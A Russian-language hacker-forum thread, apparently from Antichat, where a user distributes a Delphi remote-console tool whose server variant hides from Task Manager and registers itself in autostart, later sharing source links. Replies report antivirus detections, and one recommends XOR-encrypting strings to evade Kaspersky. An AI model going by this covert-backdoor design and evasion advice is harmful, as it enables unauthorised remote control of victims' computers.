Программа состоит из клиента и сервера, представляет собой удаленную консоль (терминальное управление компьютером). Выкладываю впервые. (Special For Antichat, как говорица ) rmcn.zip remcon.rar содержит клиент и сервер. Сервер без формы, легко завершается из диспетчера задач. remcon_t.rar - вариант сервера, который не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой Code: taskkill /im remcon.exe /f а с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run Вид клиента: Жду отзывов и предложений. З.Ы. Скачать расширенную справку по командам консоли Windows
идея неплохая лови + тока вот с кодировкой там какой то косяк... вместо нормальных букв какие то буквы зю) поправь )
Это косяк винды. Нужно создать reg файл с таким содержанием: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage] "1250"="c_1251.nls" "1251"="c_1251.nls" "1252"="c_1251.nls" "1253"="c_1251.nls" "1254"="c_1251.nls" "1255"="c_1251.nls" внести в реестр и все станет ОК. З.Ы. Если что, смогу выложить исходники. Написано на Delphi +KOL
ок спасибо сделал как ты сказал - теперь все ок ) за за исходники будет отдельный респект ))) так что выкладывай
Выложил исходники (все находится по ссылке в первом посту). Напоминаю, что написано на Delphi + KOL & MCK + WinSock2 (Есть в архиве).
Хех... Добавил в архив еще один вариант сервера - не виден в диспетчере задач, при старте прописывается в автозагрузке (невидим стандартными методами). На своей тачке не запускайте, но если вдруг запустили... завершить можно командой Code: taskkill /im remcon.exe /f а с автозагрузки убрать здесь: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
На вирустотал кидать смысла нет, прогу проверило уже достаточное количество человек, доверять можно. З.Ы. Нужно сканер диапазона сделать многопотоковым, а то медленный он сейчас
Joker-jar к сожелению твое творение спалил сегодня каспер и AntiVir,Avast,BitDefender,DrWeb,Ikarus,NOD32
Кстати, на моей практике отучить каспера от домогательств удавалось путем шифрования строк программы банальным ксором (то есть вместо myfunc('строка') использовать myfunc(decrypt('зашифрованная строка'))). В частности, каспер перестал ругаться на одну мою библиотеку после того, как я убрал явно хранящуюся константу tm = 'maskmgr.exe'. Гы
LOL. Качай справку по командам командной строки (ссылка в первом посте). А еще, насколько я помню, по-умолчанию в полях прописан путь C:\ и команда dir. Не о чем это не говорило?
Сделал бы обычный Edit1.Text для ввода команд. На кой там ListBox не понимаю. Если бы там уже были забиты команды, то это да. Хотя пока её найдёшь, легче 100 раз напечатать будет.
Порт 1666. Можно сканер сделать многопотоковым, хотя он в принципе не особо нужен. Думаю на неделе заняться новой версией